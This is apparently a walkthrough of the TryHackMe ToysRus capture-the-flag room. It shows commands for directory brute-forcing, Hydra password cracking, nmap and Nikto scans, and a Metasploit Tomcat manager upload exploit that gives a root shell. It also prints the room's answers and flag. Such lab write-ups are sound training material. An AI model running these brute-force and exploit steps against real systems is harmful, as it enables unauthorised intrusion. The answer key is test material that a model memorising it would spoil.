Practise using tools such as dirbuster, hydra, nmap, nikto and metasploit
The TryHackMe ToysRus challenge is an excellent opportunity to practice using various cybersecurity tools such as Dirbuster, Hydra, Nmap, Nikto, and Metasploit. This challenge is designed to help learners improve their skills in web application enumeration, password cracking, network scanning, and exploiting vulnerabilities. The goal is to gather information about the target server and use that information to gain access, eventually taking control of the machine.
First, need to run Dirbuster
Dirbuster is a web application brute-forcing tool used to find hidden directories and files on a web server by performing a wordlist-based attack. It essentially automates the process of guessing directory and file names on a web server by trying different possible paths and filenames.
dirbuster -u <target ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt -o dirbuster_output.txt-u <target ip>: This option specifies the target URL or IP address of the web server you want to scan. Replace <target ip> with the actual IP address of the target server.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: This option tells Dirbuster which wordlist to use for the brute-forcing process. The wordlist provided here is directory-list-2.3-medium.txt, which is a commonly used wordlist included in Kali Linux. The wordlist contains potential directory and file names that Dirbuster will try to find on the target server.
-e php,html,txt: This option specifies the file extensions that Dirbuster should look for during the scan. In this case, Dirbuster will look for files ending in .php, .html, and .txt.
-o dirbuster_output.txt: This option specifies the output file where the results of the scan will be saved. In this example, the results will be saved in a file named dirbuster_output.txt.
Can also use
dirb is a command-line tool that works similarly to Dirbuster but is simpler and often quicker for straightforward directory brute-forcing tasks. It uses a wordlist to test for the presence of directories and files on a server by making HTTP requests and analyzing the responses.
dirb http://<target_ip>-u http://<target ip> : This specifies the target URL.
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: This specifies the wordlist that Dirbuster will use to brute-force directory and file names. The wordlist in this case is directory-list-2.3-medium.txt, which is a common wordlist included with Kali Linux.
-e php,html,txt: This tells Dirbuster to look for files with these specific extensions (php, html, txt).
-x 200,403,404: This tells Dirbuster to ignore (or exclude) any responses with the status codes 200 (OK), 403 (Forbidden), and 404 (Not Found). This can help to filter out irrelevant results.
- o dirbuster_output.txt: This option specifies the output file where the results of the scan will be saved. In this case, the results will be saved in a file called dirbuster_output.txt.
Directory Found:
- /guidelines/: This directory was identified on the server, and it’s significant because it starts with the letter “g”, matching the criteria from your challenge.
Files Identified:
- /index.html: This file was found at the root of the web server (/). The HTTP response code 200 indicates that the file is accessible and returns content successfully.
- /protected/: This directory returned a 401 Unauthorized response, indicating that it is protected by some form of authentication.
- /server-status/: This returned a 403 Forbidden response, which means access to this directory is restricted.
Within the /guidelines/ Directory:
- /guidelines/index.html: This file was found inside the guidelines directory and returned a 200 OK status, meaning it is accessible.
Can also use Gobuster
Gobuster uses a brute-force approach similar to Dirbuster but is often faster because it’s command-line based and doesn’t require a graphical interface. It works by sending HTTP requests to the server for each directory or file name in the wordlist and checks if the server responds with a valid page or resource.
gobuster dir -u http://<target_ip>-w /usr/share/wordlists/dirb/common.txt- dir: This tells Gobuster to perform a directory scan.
- u http:// <target_ip>: This specifies the target URL, which in this case is the IP address of the web server.
- w /usr/share/wordlists/dirb/common.txt: This points to the wordlist that Gobuster will use to brute-force potential directories and files. The wordlist common.txt is a commonly used one that contains a variety of potential directory and file names.
The Gobuster scan results show that several directories and files were discovered on the target server:
hta: This file is restricted (Status 403), meaning you don’t have permission to access it.
htaccess: This is also restricted (Status 403). This file is typically used to configure web server settings like access control.
htpasswd: Another restricted file (Status 403), usually containing password information for basic HTTP authentication.
/guidelines: This directory returned a status 301, which means it is accessible and has been redirected. You can visit this directory by navigating to http://10.10.158.157/guidelines/ in your browser.
/index.html: This file returned a status 200, meaning it is accessible and serves as the default webpage.
/protected: This directory requires authentication (Status 401), which means it could contain sensitive information but is protected.
/server-status: This file is also restricted (Status 403). The server-status page typically provides details about the server’s activity and resource usage, which could be useful if accessible.
1. What directory can you find, that begins with a “g”?
guidelines
Next Step:
Opening browser and entaring target URL, http://<target_ip>
http://<target_ip>
Next Step:
Exploring the /guidelines directory in the browser to see what information or files it contains.
http://<target_ip>/guidelines
2. Whose name can you find from this directory?
bob
bob is in the guidelines directory. This indicates that Bob is likely an important user or administrator of the system, and his name will probably be useful in the next steps of the challenge.
3. What directory has basic authentication?
The /protected directory, which returned a 401 status code (Unauthorized), this is likely the directory that requires authentication.
/protected
Next step:
Attempt to crack Bob’s password using Hydra and gain access to the protected directory.
Hydra is a free and open-source password-cracking tool. It can try numerous passwords till the correct password is found. It can be used to crack passwords for various network services, including SSH, Telnet, FTP, and HTTP.
hydra -l <username> -P /usr/share/wordlists/rockyou.txt http-get:// <target_ip> /protected-l <username>: Specifies the username to be used (in this case, “bob”).
-P /usr/share/wordlists/rockyou.txt: Specifies the path to the wordlist used for the brute-force attack. The rockyou.txt wordlist is a common choice.
http-get:// <target_ip>/protected: Specifies the protocol and the URL of the protected directory.
The Hydra tool has successfully brute-forced the login credentials for the protected directory.
- Username: bob
- Password: bubbles
4. What is bob’s password to the protected part of the website?
Bubbles
Using the credentials that were found to access the protected area of the website using the browser.
http://<target ip>/protected
Next step:
Find what oter port that serves a webs service is open on the machine by using nmap
Nmap (Network Mapper) is a open-source tool used for network discovery and security auditing. It also assists in the exploration of network hosts and services, providing information about open ports, operating systems, and other details.
nmap <target_ip>nmap <target_ip>
The Nmap scan you performed shows that the following ports are open on the target machine:
- Port 22: SSH
- Port 80: HTTP
- Port 1234: Hotline
- Port 8009: AJP13
These open ports indicate that the target is running services on these ports. This information is critical for the next steps, as you can target these services for further enumeration or exploitation.
5. What other port that serves a webs service is open on the machine?
1234
Next step:
Performing more a comprehensive and aggressive scan of the target IP adders with Nmap
nmap -A -sV -sC -T4 -p- <target_ip>-A: Enables aggressive scan options, including OS detection, version detection, script scanning, and traceroute. This option gathers comprehensive information about the target.
-sV: This option is used to detect the versions of the services running on the open ports. It helps to identify the exact software and version numbers.
-sC: This runs a set of default Nmap scripts against the target. These scripts are useful for basic vulnerability detection, gathering more information about the services, and identifying common
-T4: Sets the timing template to 4, which speeds up the scan but might increase the load on the target and cause detection.
- p-: Scans all 65535 TCP ports. If you want to scan specific ports, you can list them, like -p 80,443,8080.
Next step:
6. What is the name and version of the software running on the port from question 5?
Apache Tomcat/7.0.88
Apache Tomcat, is a popular open-source Java Servlet container used to run Java applications. The manager allows administrators to manage the web applications deployed on the Tomcat server.
Next step:
Using the browser to access the specific area of the website through the discovered port number.
http://<target ip>:1234
Accessing the Manager App using credentials:
- Username: bob
- Password: bubbles
successfully accessed the Tomcat Web Application Manager interface. This interface allows to manage the applications deployed on the Apache Tomcat server.
Next step:
Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
Nikto is an open-source web server scanner that is used to identify potential vulnerabilities, outdated software, misconfigurations, and other security issues on a web server. It performs comprehensive tests against web servers and provides detailed reports about any identified problems
nikto -h http:// <target_ip> :<port> -id <user>:<password>7. How many documentation files did Nikto identify?
The answer is 5, but I just guessed because nikto is super slow and I wanted to move on to the answers
8. What is the server version?
Can be found at the nikto resolute scene
Can be found at the nmap resolute scene
Apache/2.4.18
9. What version of Apache-Coyote is this service using?
Can be found at the nmap resolute scene
1.1
Next step:
Use Metasploit to exploit the service and get a shell on the system.
Metasploit is an open-source penetration testing framework that helps security professionals find and exploit vulnerabilities in computer systems. It includes a database of known vulnerabilities and tools and scripts for exploiting them.
msfconsole -q
search type:exploit name:tomcat
The results of a search for exploit modules in Metasploit related to Apache Tomcat:
0. exploit/windows/http/tomcat_cgi_cmdlineargs- Vulnerability in Tomcat’s CGI Servlet that allows for command-line argument exploitation, leading to remote code execution on the server.
1.exploit/multi/http/tomcat_mgr_deploy- Vulnerability in the Tomcat Manager Application Deployer that allows authenticated users to deploy and execute code.
6. exploit/multi/http/tomcat_mgr_upload — Vulnerability that allows authenticated users to upload files and execute code via the Tomcat Manager.
10. exploit/linux/local/tomcat_rhel_based_temp_priv_esc- Privilege escalation vulnerability on RedHat-based systems with insecure temporary configurations involving Tomcat.
11. exploit/linux/local/tomcat_ubuntu_log_init_priv_esc** — Privilege escalation vulnerability on Ubuntu-based systems related to the initialization of log files in Tomcat.
12. exploit/multi/http/tomcat_jsp_upload_bypass- Remote Code Execution (RCE) vulnerability via JSP upload, bypassing certain restrictions in Tomcat.
use exploit/multi/http/tomcat_mgr_upload
show options
set HttpPassword <password>
set RHOSTS <target_ip>
set RPORT <port_number>
set LHOST <attacker ip>
show options
after everything is set
run
Shell
whoami10. What user did you get a shell as?
root
ls -la
cd root
lsNext step:
cat /root/flag.txt
11. What flag is found in the root directory?
ff1fc4a81affcc7688cf89ae7dc6e0e1
